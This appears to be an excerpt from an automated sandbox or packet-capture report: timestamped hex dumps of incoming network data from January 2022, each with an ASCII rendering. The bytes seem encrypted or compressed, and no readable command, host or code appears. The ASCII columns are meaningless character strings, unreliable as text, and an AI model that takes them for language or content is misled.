                                                                                                                                  2022-01-11 22:39:10 UTC3862INData Raw: d9 40 0f 1c 43 45 4f fc 80 79 9a 29 eb ad 57 d9 51 c2 99 82 5b 50 19 f9 fd 21 66 b7 de 83 43 e6 26 5f c7 7c 86 a4 88 13 79 52 4a 9e 3e f2 69 ae 02 9a cf 1e 71 b4 b9 28 ea ef 9f 20 37 e6 df a0 0e 3d fe 5e a9 f8 98 4d 1d 68 f3 f9 cf f8 42 d3 01 11 10 81 86 3b 77 96 36 f3 72 dc cd 82 14 8c 6a 61 4e c1 2e 60 36 07 e7 2a bc f9 b9 28 de 0b e9 a9 2d be ed 73 b7 90 34 af 1d a1 c3 96 b0 b1 b4 df 67 78 11 1b 3b f7 95 37 33 df ec a9 ee 5c 42 24 dc 0e 50 0e 62 6a 17 e0 04 9b 8e ad 14 de 3a de 1b e5 28 d5 14 3d ab c7 17 fc a5 34 5b e9 8f c4 93 4c f7 6b d5 f6 d7 d4 9e 38 06 0a 6f c9 d5 55 90 36 ae b3 11 90 0a 83 23 38 84 58 19 55 3b 99 af 45 3d 5b 85 a8 39 5f 40 b4 aa 05 09 16 a0 b4 86 4c 65 1a 67 39 91 8b d7 e1 9f 58 27 75 43 1a 40 f0 18 8d 77 37 4c 51 49 c9 31 04 08
                                                                                                                                  Data Ascii: @CEOy)WQ[P!fC&_|yRJ>iq( 7=^MhB;w6rjaN.`6*(-s4gx;73\B$Pbj:(=4[Lk8oU6#8XU;E=[9_@Leg9X'uC@w7LQI1
                                                                                                                                  2022-01-11 22:39:10 UTC3878INData Raw: 47 d6 b0 44 21 2c e1 29 10 4f f4 c3 24 b1 e1 9a c7 9e b8 0d 7a f9 96 b9 b4 6d 0c 98 c3 8b 8e 4a 91 a3 a2 2d bc 09 39 8f 26 36 2d 00 8f ca 6b 7e 10 2a 9a b1 ea ec 55 86 5b 89 cd e7 e7 53 c4 06 23 85 6e e7 30 15 1c e8 dd 23 58 57 ab 20 f5 25 60 93 3d 41 8d 8b e7 3a ac 5a 04 d2 43 b0 50 27 d5 17 bb ed cc c2 e4 f6 d8 d0 03 e2 e7 0f f9 ff 26 0d e6 23 d0 f2 44 e1 e6 1b b5 fe bb 9a 6a 62 fa 8e 4c e9 2a de 9e bf d3 42 b0 0d eb 3f 10 c9 10 70 83 b1 5a 7c c5 1f 08 4b 41 0e 44 7b 29 57 d8 00 a6 c4 99 5c c4 06 c1 16 51 16 8d 2d ee 07 f1 6b 00 ee d1 80 44 29 a7 cb 3e c6 f1 58 2c 61 af c5 6c 47 47 0d da 97 f9 28 17 65 3e 36 2e 8b ed d3 c4 fc 9d 89 05 67 51 7f 08 e2 48 09 3e 1a c3 3b 52 d4 ea 4b 01 58 bb eb e6 66 49 a6 52 7b 38 ec 16 97 75 3c f4 46 0b e5 66 40 f6 0b 32
                                                                                                                                  Data Ascii: GD!,)O$zmJ-9&6-k~*U[S#n0#XW %`=A:ZCP'&#DjbL*B?pZ|KAD{)W\Q-kD)>X,alGG(e>6.gQH>;RKXfIR{8u<Ff@2
                                                                                                                                  2022-01-11 22:39:10 UTC3894INData Raw: 3d b4 af 79 f6 69 4e 83 67 63 a5 9a 8a 37 4f cb a3 89 1e 4b 90 fa ed 4d d9 6f 84 cb c1 fd 3f 88 04 85 30 92 ed 1d 2a e7 0b 09 97 4b 9f a9 d1 92 5b 73 17 5f d3 d5 c0 04 55 ee bb 53 93 3e ba f3 eb 64 28 16 71 c6 29 b8 eb ff c5 ec b7 27 43 19 ec a5 f4 6d 70 f2 66 fa 8e 46 2c c7 46 9c a8 6d 72 d5 6a 31 93 0a 4a 43 13 75 63 44 66 5d 54 82 9a 9d c4 ec 01 08 7c fd e4 e3 2f 60 78 3e 11 e4 a0 69 11 67 a5 03 ee 44 cc 34 3a 71 b3 35 bb 7b b4 49 d4 2a 59 e6 2d bd 1b 63 f7 e2 c5 19 60 9f a0 83 0b 6f 12 90 9f 1d 78 50 25 d8 46 f6 3d d6 42 d3 33 05 e2 98 fd a9 f2 1b 4d c8 7e 69 6f e0 5e 17 5f dd 23 3a d0 67 ab 5b 48 13 be 64 41 5c 0d 4f 7f fb 33 69 5d 52 88 60 65 e5 85 b0 ed 7c 6b 56 b2 42 d6 1c 97 39 8b 47 9f d1 a5 ab 6b 7c 3d 9a 9c f4 d6 3a 63 04 6b e2 1b 90 cd ca 81
                                                                                                                                  Data Ascii: =yiNgc7OKMo?0*K[s_US>d(q)'CmpfF,Fmrj1JCucDf]T|/`x>igD4:q5{I*Y-c`oxP%F=B3M~io^_#:g[HdA\O3i]R`e|kVB9Gk|=:ck
                                                                                                                                  2022-01-11 22:39:10 UTC3910INData Raw: d4 95 7b b6 83 1b f4 d8 79 b3 a7 6c 02 cc ac 90 22 69 8e 75 0a da f8 fb 49 d7 74 15 01 8b 49 cf b2 a0 bf d6 e2 3f fd fe 76 d8 6b ab 7a 5e fb c5 f9 e6 b0 07 f7 c5 73 39 7f d1 e6 05 45 09 81 14 0f b6 c8 7c 91 e8 38 c3 ce ea 15 5f 03 35 ff b7 c0 09 3b a0 de f2 cc 36 76 0b 23 af 5a a2 c6 91 2d 66 05 e8 36 96 c6 16 95 db b5 56 27 b1 2d 27 cc b1 6c 4e f8 ec 7d 1e 5a b3 29 e8 00 9a da 76 02 20 0c 87 4b c1 61 34 1e 9f d1 e0 27 ef 17 a4 55 94 a0 81 27 6b bf 5b de 43 10 a6 64 ed a6 12 cd 04 1e 64 3d a1 50 87 6b a5 d5 3c 4a 10 e7 39 cf 1a 93 55 eb 34 a5 d3 6c 79 05 d5 4b 6f 6b 1b 26 a5 ab 65 67 be 55 17 72 6c 99 49 6a be a0 03 47 08 6b 15 aa 49 3f d9 08 5e d7 39 27 8c c4 f7 73 49 fc de d3 fd 1f a8 39 7e 80 c1 91 82 cf fe 1a 72 db 42 19 33 d5 53 0f 0e 36 37 72 20 ce
                                                                                                                                  Data Ascii: {yl"iuItI?vkz^s9E|8_5;6v#Z-f6V'-'lN}Z)v Ka4'U'k[Cdd=Pk<J9U4lyKok&egUrlIjGkI?^9'sI9~rB3S67r
                                                                                                                                  2022-01-11 22:39:10 UTC3926INData Raw: e7 7a 19 b7 68 c0 9c dc 2b 3e 84 d3 fd eb 1c 4e 9a d6 bf 39 09 b5 ed 04 33 00 fe 7d 4a 49 15 4e da 91 82 f1 91 93 75 a8 8f 12 ac 2a 87 11 3a 96 a4 76 5c 4c cf d6 76 10 e9 8f 3a 35 b4 3d 3d 91 d9 e1 0a 72 6e f8 8a 4a 64 65 e0 21 dc 05 ff 38 d5 3e 33 cd e1 4b 98 3a 9b 59 2e 61 66 04 30 8f f7 47 27 c7 cc 67 eb 1d 20 26 eb 59 3a f1 41 fb 09 8c 23 c8 80 4c 9d 1d 79 20 fd 42 0a 51 72 4e 12 4f 6b 14 e5 25 c3 e4 3e a7 b1 20 72 3f 3f b8 80 92 60 35 0d ba ff b7 a4 8b 45 fd 7c 61 72 a5 18 48 97 11 7e 40 a5 db 6f 66 90 ef c1 ce 64 4d 0a 98 9c ca 13 a3 e2 d3 80 68 17 2c 9a a3 bd c5 4d 92 75 17 7e ed 04 71 fe de 85 e9 e5 28 c6 04 76 f3 c3 64 0a eb 18 05 37 69 55 ba 5f fd 90 ea b6 0b fe c9 40 90 fb 19 34 4c 7c 2f c2 14 3d 2d 69 62 10 10 84 2b a4 cb 3e e4 9c 5c d8 94 1a
                                                                                                                                  Data Ascii: zh+>N93}JINu*:v\Lv:5==rnJde!8>3K:Y.af0G'g &Y:A#Ly BQrNOk%> r??`5E|arH~@ofdMh,Mu~q(vd7iU_@4L|/=-ib+>\
                                                                                                                                  2022-01-11 22:39:10 UTC3942INData Raw: 12 f4 41 cf f9 23 bb 4f 2f e9 2d 38 90 db 81 9f 22 df b5 75 af 42 6c c2 34 7e 56 5d 49 87 62 fc 8a e8 da 00 57 17 63 0f 2b 0b ce 2d 1f 72 72 cf cf 25 b4 fe 3c 53 e0 99 49 fc 88 33 fb 0e 77 a6 f4 f6 2f b5 f2 af ce a6 64 82 29 fa 03 cf 3b 85 2b f0 3b c7 89 50 56 bc 8b e5 f5 75 cc a3 c3 f0 db e1 6b f7 87 a1 ee 98 39 51 a8 ee e1 ef be dd 2a fa 3e 24 c9 5a 26 25 bf 52 45 d9 ee cc 9a ba e3 ac d4 95 1d ec 9c ed b1 63 bd 3c 0a 75 09 de 00 bf 11 75 6f 19 47 ce 3b ec 3a 9a 80 3e 22 4d 7e f1 c5 49 75 3e 14 82 a8 60 92 3f f7 a9 9f 61 9f e7 d1 52 61 29 31 6f 2c 11 63 84 13 6b f5 3f 9d 4e 23 80 d3 c5 dd fe e6 9f 20 5b 78 d3 d2 a3 06 d0 4b 2d 6e 57 ee b6 df 22 ca 41 3b 82 fb dd a7 39 02 eb ba 75 44 0f cb ba 54 bb 43 bc 15 5b d8 07 d7 c0 5e fb 23 55 19 29 03 08 6b 44 a0
                                                                                                                                  Data Ascii: A#O/-8"uBl4~V]IbWc+-rr%<SI3w/d);+;PVuk9Q*>$Z&%REc<uuoG;:>"M~Iu>`?aRa)1o,ck?N# [xK-nW"A;9uDTC[^#U)kD
                                                                                                                                  2022-01-11 22:39:10 UTC3958INData Raw: ef ec 13 cb 01 f9 81 8f 77 2f 86 c7 e3 fb 2f 1f b9 2a 68 9a 05 10 ad 7b 85 cd c8 34 57 fd 43 a6 79 37 8d 01 b5 ce 6c b4 68 5d 21 11 30 c6 0e 4f c2 18 19 5e 6b d1 35 bc 33 ea 98 04 5b 75 30 f4 e6 77 79 31 d2 ac c7 a6 48 9b 15 9e 31 c5 ed f5 10 7d 5f 7d dc 58 f7 4d ed 45 bb 8a 69 f9 1d 52 96 1f 3e 99 9a 9f b3 6f 77 de 9f 2f 34 11 be 7e 31 84 8c 35 80 6d 5b cc 35 a7 a3 aa c6 b5 85 0f 3d 3c 0a 81 8d b5 50 2a 8d a9 bd ae e7 2c b3 25 24 51 fc 19 86 f3 d1 c0 32 86 d5 a7 e3 3c 42 e5 bf 98 7c 65 63 11 3a b0 b3 ab 10 52 f5 92 ba f8 c4 14 54 17 21 94 13 ac f3 62 d7 48 da 50 9d 67 e1 8a 12 18 f0 d8 56 0d 4e b2 72 d5 3a 3a c0 ab f7 0c 2e ae ba d0 a1 e9 27 f7 39 52 68 4b 2a 95 1e 56 4f 07 3f 9b ca 6d a1 66 a9 b8 55 bb 75 a7 82 f1 80 71 60 e9 1e 8e a2 e8 2c 49 61 c0 f9
                                                                                                                                  Data Ascii: w//*h{4WCy7lh]!0O^k53[u0wy1H1}_}XMEiR>ow/4~15m[5=<P*,%$Q2<B|ec:RT!bHPgVNr::.'9RhK*VO?mfUuq`,Ia
                                                                                                                                  2022-01-11 22:39:10 UTC3974INData Raw: e5 5d 78 2f b1 e9 34 60 9b ef 65 ee 60 4a 11 24 f2 66 3d be a3 ed a5 7f 67 58 69 df 6b 56 d4 c9 b1 24 94 e9 e8 dc d2 8c 8b f3 a4 76 ce 46 d1 78 0d d2 20 0c d7 e5 ee 35 b3 0f 3b b0 91 c1 05 1c 9c 73 e3 d2 b4 32 a2 41 52 65 2f cf 66 45 1d 87 04 53 97 6d 4c 83 ff 98 74 ec d1 f0 2c b4 2a 1d 07 07 65 82 f9 43 19 6f 92 aa 43 b5 00 cb a1 8f f1 bd b3 eb 99 67 ec 0a 6e f5 f8 7a 08 e4 0c 54 63 7c 65 3d 2b d6 45 97 e8 a7 4b 7d 7a e7 84 c8 ce 25 4a 15 63 97 38 0b 94 d8 2c b5 95 7e bb 36 1c fa c1 b3 7e 12 22 2c 2e bf 74 6b 26 d8 4d fd 10 8e a0 03 eb 88 b5 c9 85 b5 6e 3b 15 b7 07 88 2c 73 f3 45 1e e3 02 98 e4 98 a9 e1 ea e0 b2 f2 b4 15 87 3a 22 2c bd 31 94 be cd 61 b6 12 f5 59 5f 13 69 b7 9d bd a4 03 47 c3 35 ee 5b af 90 10 d9 9f b1 f6 f9 42 bb 1b ba c5 8e bf 64 53 eb
                                                                                                                                  Data Ascii: ]x/4`e`J$f=gXikV$vFx 5;s2ARe/fESmLt,*eCoCgnzTc|e=+EK}z%Jc8,~6~",.tk&Mn;,sE:",1aY_iG5[BdS
                                                                                                                                  2022-01-11 22:39:10 UTC3990INData Raw: 2d 94 c4 31 ee ae f8 e9 14 48 bf 39 ec 5e 8f 42 b5 a8 17 6c f2 5e e3 c2 a6 ee 95 d8 ba a0 bb dd ac 2f 0f 8a e2 3d ae 0e 33 ee e0 b9 60 9d d0 fc 12 cd 69 af 06 23 88 db 29 88 af a9 5b 37 90 25 bd ff ef 05 09 e6 45 e1 85 29 07 e8 8f f1 3f 7e f3 7f 56 ee e8 81 95 8a 80 d3 82 6f 13 ab a4 e8 3d 20 7d 98 fe aa dc e9 61 f2 eb bb 74 eb 3f b4 7b 5f 65 6d 53 e7 57 cb e0 eb aa fe 29 22 f2 40 36 ea 96 7f 8b 5b 6d 81 c6 42 f0 10 33 08 b0 4a 20 e8 15 da 76 fb 0e 9b 87 1a a1 8d 4b db b3 91 de c0 92 63 9c 94 45 bb ac a7 1b 22 46 da b5 4b 42 1c 81 17 2d 11 07 7e ac 55 b9 50 a4 f8 72 77 59 84 44 f2 e4 b5 08 4a d3 b7 28 f8 95 75 5a 2c ca 17 01 4c b8 15 f6 33 cc 67 a3 cc 55 68 e8 f3 a8 47 6d d3 e7 c0 dc fa c9 46 40 5a 61 ad fe a8 af 9f 41 f4 32 2b 56 67 ae 26 c7 54 37 86 d5
                                                                                                                                  Data Ascii: -1H9^Bl^/=3`i#)[7%E)?~Vo= }at?{_emSW)"@6[mB3J vKcE"FKB-~UPrwYDJ(uZ,L3gUhGmF@ZaA2+Vg&T7
                                                                                                                                  2022-01-11 22:39:10 UTC4006INData Raw: 75 78 8e 45 70 a1 1e 03 2d 98 41 27 7f a7 b7 ed 7c 19 95 32 51 ef 93 02 cc 06 35 93 24 ee cd 1e 4e c5 05 c8 cf 8a 8b 50 cb a5 d5 17 8b 8b 7b 49 3c ed 9e 8c 21 7d e8 a1 33 ed b6 76 b1 be 23 6e 1f 5d ac 3e 51 af be 78 8c fe c5 b4 e0 a7 90 cf d6 c4 cc 96 51 02 a4 af 1e 47 0f 96 f0 4f ad f2 2e 56 0e 8b 88 e4 4b f8 6f 05 48 1f 60 2f 59 8d 65 69 22 78 df 75 ad a9 1b f1 06 a6 bf e4 f1 4b fe c5 04 42 83 12 a1 d5 eb e1 c5 d3 e2 b5 e8 19 7d 37 a2 50 ed b6 51 fd da dd fa 02 05 2a ac 07 42 a8 72 41 5c a8 c5 d3 3e c9 47 77 3a f8 96 08 b1 f6 0f 33 9f 00 85 d2 ee 94 d5 3e ca d9 24 c1 58 25 36 53 e4 8a 3b c8 6f 27 be 53 f2 2b c2 98 c0 d7 2e 12 a6 d2 c0 63 26 8b 5f a9 74 02 d9 59 76 b5 33 6f a2 2d d7 13 de 95 5b f1 8c d0 a1 6b 59 62 17 ad 80 33 03 ff 9a 95 01 ad d5 f5 8e
                                                                                                                                  Data Ascii: uxEp-A'|2Q5$NP{I<!}3v#n]>QxQGO.VKoH`/Yei"xuKB}7PQ*BrA\>Gw:3>$X%6S;o'S+.c&_tYv3o-[kYb3
                                                                                                                                  2022-01-11 22:39:10 UTC4022INData Raw: b1 0e b9 9d 03 32 2e 0c c8 01 10 f2 81 3d e0 31 eb bf 70 1e 94 65 b7 8d b6 5a 8e df 63 c4 9a d6 c2 55 62 45 e9 6e 8d 97 0d 99 ae aa 99 a3 53 b0 66 ac aa 1c 10 1e b5 79 ec 5e 6e 92 bf 59 2b 9b a6 9b 55 2b 73 d1 07 98 5e e4 9f 83 07 16 53 0e ec be 18 19 bc c0 88 4a eb 04 3a 07 9b 12 f6 23 62 28 d6 aa 0b c9 d5 46 ac e5 68 ee 19 69 e7 36 43 b9 85 c4 f7 47 66 3f db b8 d6 e3 46 a7 74 87 69 35 00 5a 46 01 a9 f0 53 78 ba 3b 76 50 97 e8 da d0 a0 da f6 ff 39 68 8a 09 eb 91 cf cf 7d 80 62 45 88 24 15 09 3f 12 92 e1 64 20 6c ba 86 b5 50 e5 0b 82 2f 92 c7 bd 5d 9d 68 da 86 3a b1 1b 53 4e fd f7 ee 92 46 df 11 a7 0e af d8 45 ce 09 e4 f6 2e ad f9 2b 1d 97 42 3b e1 6d f8 26 62 a7 78 7e 6e bc f6 03 bd fb 34 88 fb 99 4a a5 d2 f8 4b 18 88 45 bd 84 08 92 95 a8 fe cd 9d 2e 21
                                                                                                                                  Data Ascii: 2.=1peZcUbEnSfy^nY+U+s^SJ:#b(Fhi6CGf?Fti5ZFSx;vP9h}bE$?d lP/]h:SNFE.+B;m&bx~n4JKE.!
                                                                                                                                  2022-01-11 22:39:10 UTC4038INData Raw: 73 cd 84 60 d8 3c 66 f2 18 4d 82 7b 40 a8 b3 de 64 79 3a 5e d0 fe 3e e2 b8 6d 89 c9 39 10 c5 e8 54 67 70 8c 8b fb f4 91 5a 0e 4a 71 06 62 6f 07 df b7 77 e4 5e 2a ce 47 2c e9 3f b4 e2 5c c3 23 76 d2 90 87 57 d9 c9 51 84 3c b4 8e f7 0f de 4d 8a c0 df 22 6f 41 b3 e7 b2 22 9d f5 34 2c d0 66 9a 7e 20 10 5b c7 b8 73 a3 aa 75 da 7a 6a 1b 7b 2f a6 ab 1a a6 0b 46 d9 d3 c4 51 b6 1f 56 94 02 9d 42 3c 40 63 8a 82 0c 99 d4 46 83 63 c0 27 4d 4d fa 21 a7 fb 2f 00 65 85 a5 f4 fb 5a 9d cd cd 3c 2f f0 29 f0 49 7b 71 96 8c 30 ee 15 45 b6 99 b7 63 bf 96 3c e3 27 13 47 d3 4d 53 1d 12 ae 7e d6 d8 56 ae 4d 39 83 cb 00 73 64 c2 dc a1 cd b3 04 f0 3b 1e ff 4c b0 58 57 7f 30 e5 c3 44 c9 56 8f 5a 72 3f 34 4e 59 26 a9 f9 35 f9 35 3f 90 e3 5f 0b e9 18 45 0d f7 fd 66 b3 b0 56 a5 ae 35
                                                                                                                                  Data Ascii: s`<fM{@dy:^>m9TgpZJqbow^*G,?\#vWQ<M"oA"4,f~ [suzj{/FQVB<@cFc'MM!/eZ</)I{q0Ec<'GMS~VM9sd;LXW0DVZr?4NY&55?_EfV5
                                                                                                                                  2022-01-11 22:39:10 UTC4054INData Raw: 0f c6 5a c0 b8 50 12 fe 99 31 ef ac 4c 3c 59 e5 9e 3b bc 50 ab 8c b7 97 cd 3f ab 59 59 50 9f eb d4 0f 43 11 2c bf c3 18 5f 1f de 09 2d e8 95 8d ac ac be 9f 59 0b 45 c8 68 dd be 17 e6 e9 44 cc 19 95 9b 7b 7f 1d f1 8d 2c 15 7d 15 02 e0 c9 e9 08 1a 1c 4e d5 6e e3 b8 c0 38 ac 1b 19 40 71 0f 0c 49 f3 f0 4c ce 3c a7 27 8d 4c 11 e5 d8 d6 98 db 93 85 44 3b f6 46 f0 74 cb 19 61 4f 78 02 27 66 4a cd 87 60 de bc 0e 0a cf 17 d0 f1 ec db 1e aa 1b b6 8e 19 1c a4 b0 be a7 34 03 04 9a 8b 2c 7f 9d 29 21 18 82 65 ed 3c 38 fb f7 9d 5b 25 ba ae 15 bc a1 e8 49 fb d3 20 72 ff 29 1d 28 73 87 d4 d4 ae 3b b0 0e f4 49 4f 42 96 c4 0b 4a ad 7d e8 be 32 22 c7 30 11 51 01 ed 31 06 b5 ad 43 cd bd 36 f8 6b 95 1a 64 0e 1b a7 ff e7 eb 95 ee 16 45 dc 59 cc 8b f3 ae ba 7b 59 1d ee f3 d2 7c
                                                                                                                                  Data Ascii: ZP1L<Y;P?YYPC,_-YEhD{,}Nn8@qIL<'LD;FtaOx'fJ`4,)!e<8[%I r)(s;IOBJ}2"0Q1C6kdEY{Y|
                                                                                                                                  2022-01-11 22:39:10 UTC4070INData Raw: c4 a3 a6 f1 69 d9 b8 a5 db 32 9b cb 5e ca 1b d2 01 10 0e 25 db 25 12 52 6a a4 eb 01 d4 17 1b e9 f5 a8 f3 39 99 65 54 3d 30 bb 21 78 65 62 ef f0 ed 51 06 d4 03 70 be ab 44 38 89 fd a4 38 6d c1 91 c2 ff 13 d9 97 7d 5c 60 5f c9 0b 94 f4 13 2d 5b c4 1f 4e 09 a3 bc bc 89 bb ab 78 cd 72 c1 be 40 bb cf b5 74 d8 95 ad ac a9 6d 7b e5 1c 19 ce 0c fc b0 d9 52 3d 72 72 6a 1c 28 74 e2 e3 8f 14 cf 0a 76 7a 9d bf e4 d9 44 57 14 25 18 e5 69 21 30 c5 9b 39 0f b6 c7 3d 40 f7 64 d2 ce e8 ab 52 64 4d 6d 17 af 63 01 0b 32 45 78 65 9c 8a 27 05 45 4e 02 66 ed 6a 63 82 ed d1 c8 25 6e 85 f3 01 89 c2 e5 b1 16 2f ed cf 27 82 d8 03 6c 07 70 fd 41 07 77 b2 e7 27 6f a7 5e 7f 28 4f 71 3a a5 62 93 a1 a9 de cc c1 8a 61 9e 15 1d bc a9 84 e7 38 85 5a ff 5e 64 a4 f2 2c 32 1a 95 7e 6a 9f ae
                                                                                                                                  Data Ascii: i2^%%Rj9eT=0!xebQpD88m}\`_-[Nxr@tm{R=rrj(tvzDW%i!09=@dRdMmc2Exe'ENfjc%n/'lpAw'o^(Oq:ba8Z^d,2~j
                                                                                                                                  2022-01-11 22:39:10 UTC4086INData Raw: bb 62 98 ec b5 5d 42 ba 70 39 32 7b 56 31 0a e8 4e 12 41 39 68 90 92 6a 46 6f 89 ff 3d 16 1b 66 0e d5 07 c1 08 f1 9e a0 32 8c 42 0b 49 7c 13 70 9a 67 5e a1 1b 3b e8 9f 30 0e 49 4f 76 4f ce f0 83 77 92 82 ac ed f7 bc db 2d cf f5 57 80 77 e3 29 d4 cf 3b 4a a1 68 8c 06 a0 1d 1d 0e 9c 46 84 6b c5 d7 64 3b e4 e1 50 06 f8 a6 81 05 ce ce 0d 63 ea 20 60 5a fb 20 fa 6c 7f 6e 11 4f 69 c6 af 1d 07 4b 92 d5 5b 5a 3b 3d 09 0f ea 88 ed b9 89 d7 2a 18 fd e3 99 7c d2 82 e7 3a 04 e0 3e e7 74 ec f3 bf c9 cf db 4e d2 ab 5a df 5e a4 be 0e fd dc cb 6a c6 e5 6e 82 4f bf 84 88 ad 4d 52 3f 11 03 4e 33 e4 be 20 1f 75 08 47 e3 26 c1 4e 17 c5 c1 7d d8 f0 ad 4c d2 16 1b 96 a7 e9 17 42 72 c6 1a c4 2d 36 d9 e3 b7 32 d0 04 c9 17 5d c6 fd 00 97 42 09 a9 89 17 18 a8 67 d8 19 15 63 d5 ac
                                                                                                                                  Data Ascii: b]Bp92{V1NA9hjFo=f2BI|pg^;0IOvOw-Ww);JhFkd;Pc `Z lnOiK[Z;=*|:>tNZ^jnOMR?N3 uG&N}LBr-62]Bgc
                                                                                                                                  2022-01-11 22:39:10 UTC4102INData Raw: 1e 14 11 35 fd f0 14 e5 da 0e 8f 37 e5 65 cc d6 76 16 34 87 19 a5 a4 df a5 01 0f d9 ba 45 86 c8 ef 7e 71 ab 9b be ec 9c a9 08 ee e0 b3 6d f1 60 e1 dd f2 85 99 1b cf 7f 64 77 4d 2f d2 c7 3e 1c a4 50 bf 08 a7 01 d1 c0 c6 79 b2 bf ba 46 bb b8 b9 29 49 3d b1 f5 6b 56 97 c7 c6 fe 14 6d ff 34 73 c7 08 9c c0 23 13 56 f1 b1 15 f7 9c 4c 04 4f e1 7d d4 d8 8a d7 2a 0a 89 37 c2 66 bf 50 3e bf 84 53 f1 ba 0f ea 27 ed 1e db 37 05 b5 f8 1c c9 7b 6b d4 3a a0 80 29 8d 79 7e c4 aa f9 f8 9d e8 3c e4 c6 f5 ef 60 50 24 77 12 0f 92 7e ab 2a 08 45 5d 31 91 f8 37 dd 24 3c 94 7c ae 79 e1 47 32 c6 f7 68 5e 70 59 8e 9c cd a6 8e 9e 0b 41 d6 ea 1d 28 35 4c ee f8 e2 40 f3 ee 8b ae ad 85 27 90 37 e4 d7 5b 58 e5 69 5e e2 d6 96 5b 7b 34 9c ba 0e 7d e2 7b 04 8c 58 a3 d2 89 41 d8 41 57 4b
                                                                                                                                  Data Ascii: 57ev4E~qm`dwM/>PyF)I=kVm4s#VLO}*7fP>S'7{k:)y~<`P$w~*E]17$<|yG2h^pYA(5L@'7[Xi^[{4}{XAAWK
                                                                                                                                  2022-01-11 22:39:10 UTC4118INData Raw: 8a 50 85 03 55 4c a8 d4 4e f8 f8 fb b4 0c 52 71 a8 f0 7a 3b 2b 2b 8d 64 28 8f d6 47 82 49 d5 8d a6 19 0d 30 5d b1 4c bd b4 e1 f1 d5 18 73 97 ff b3 ce 1f 69 06 38 28 2f 88 35 1e e0 95 25 bd 76 cb 74 fe 99 87 46 b7 3b 77 03 39 80 b0 22 aa d2 bd 60 e5 08 c5 71 db 57 ca f7 b4 f6 68 3d 7f 2d a0 54 e3 41 06 99 c0 f2 56 f7 9a 23 84 26 ab 36 97 57 b6 68 40 51 9e 50 d9 7f 03 39 f2 69 1a f2 b2 8f e6 8e 01 14 69 c6 c3 59 1e 28 22 2b c4 c6 06 39 c4 af 0b 8a 42 65 d3 c4 cd b9 4f 6f ad 8d a9 2a ba e9 ac 55 f2 cd f8 21 be 86 ec f9 da e1 46 76 21 e1 39 fb 80 6a 06 cf e0 79 af 77 b2 76 2b 9c bd 8f 80 23 73 5c 3b 42 46 f4 f7 77 0f 41 3f c3 ae da 3c 1c 6b e8 10 21 e5 51 96 8e d4 d6 93 db c9 e1 6f 6f 3c 5e 1e f4 b5 d8 17 8f fb 0f 0e a3 81 d5 10 a8 80 a4 76 1c c2 39 66 ab 9a
                                                                                                                                  Data Ascii: PULNRqz;++d(GI0]Lsi8(/5%vtF;w9"`qWh=-TAV#&6Wh@QP9iiY("+9BeOo*U!Fv!9jywv+#s\;BFwA?<k!Qoo<^v9f
                                                                                                                                  2022-01-11 22:39:10 UTC4134INData Raw: 4a 74 b1 87 99 8f e1 4f ce ef 58 72 80 a4 27 94 71 ae a6 b6 73 fd 5c 6d c7 83 8b 9f 6b 60 d9 a3 a2 01 30 b6 38 7d a2 95 44 48 9a 25 01 be a3 43 be 31 40 44 57 47 bc 59 0c 74 c7 eb aa 29 27 c4 21 4d 3c e7 62 7e b0 9d c5 e5 8c 26 e4 20 ea ca e6 9a b2 33 ce dc 10 2d de 9e 5e 25 61 2c e7 fa ed 85 69 56 6b bb b7 38 d6 7d 54 18 61 7d 78 cf e0 e7 a8 53 ca a0 8a 9d fa 71 9a b4 e5 a5 93 5f af 48 b9 a9 7f 2a 18 5d 9e 96 51 dd de 2c 65 f5 d2 09 2d 37 3e f5 49 50 1c 64 f6 57 1d 5a 0a f7 c8 8c dc a7 e9 fc f8 19 2a 73 f7 fa 35 29 36 27 cd ff b3 fd e9 5b 74 98 9a 3b 24 a3 23 39 ff b4 51 d1 cd af 2f dc 62 f3 d6 29 bc 03 19 cd a5 25 85 0e 8d 03 a5 b9 e5 cb 87 37 c5 b5 33 16 a1 99 79 e9 bc 24 f8 72 46 b1 ec 53 b5 a6 b7 1c 6f 20 06 3b ac 4b a5 03 81 8c 8a dd 22 14 0b 6c b5
                                                                                                                                  Data Ascii: JtOXr'qs\mk`08}DH%C1@DWGYt)'!M<b~& 3-^%a,iVk8}Ta}xSq_H*]Q,e-7>IPdWZ*s5)6'[t;$#9Q/b)%73y$rFSo ;K"l
                                                                                                                                  2022-01-11 22:39:10 UTC4150INData Raw: 59 10 8e b1 4e de 7b 70 59 7a 8b 5e 59 76 de 94 d9 cb d8 f4 c0 f9 02 a2 b0 a9 50 43 5f 6b 79 ef 89 97 a6 2b 8e b3 16 96 56 c5 0d 65 5b 69 3f 52 3c c3 96 a5 a1 43 1d 9a 19 a7 b8 3f 78 be 30 11 45 a3 4f 2b db 65 90 42 8a 00 8c a3 42 14 4f f6 a8 f1 a6 a5 7e c6 2b b0 0c 5b ed e0 f9 37 4b ef 0d b7 9d fd 94 4c 18 4b 51 c0 5e e3 af 4d ff 1c 83 f9 dd b9 b6 e3 6c 74 f5 94 19 23 a4 21 a4 3b 26 33 b2 ea 51 94 8b 68 56 12 7f 70 e3 1b 2e 07 0e f9 dd 1e 30 8d e0 f0 bf c5 46 7e 53 1b 17 ee 44 3d de c5 74 a8 33 85 c3 37 04 aa 7a ad af 51 97 07 30 b8 42 93 f6 24 75 3f 05 cc 90 2c ac 9f db ee e6 72 1e 9b 6a f3 ca 86 17 08 09 d5 cb 42 88 85 c0 d6 39 6b 7b 38 8c 1e b3 b8 10 95 6a 2e 01 3d 05 67 ff 55 bd ce 5c 1d 4c e5 ec 84 4d 07 de 53 6f 07 cd f0 94 0c 2f b2 3b 81 43 fb 50
                                                                                                                                  Data Ascii: YN{pYz^YvPC_ky+Ve[i?R<C?x0EO+eBBO~+[7KLKQ^Mlt#!;&3QhVp.0F~SD=t37zQ0B$u?,rjB9k{8j.=gU\LMSo/;CP
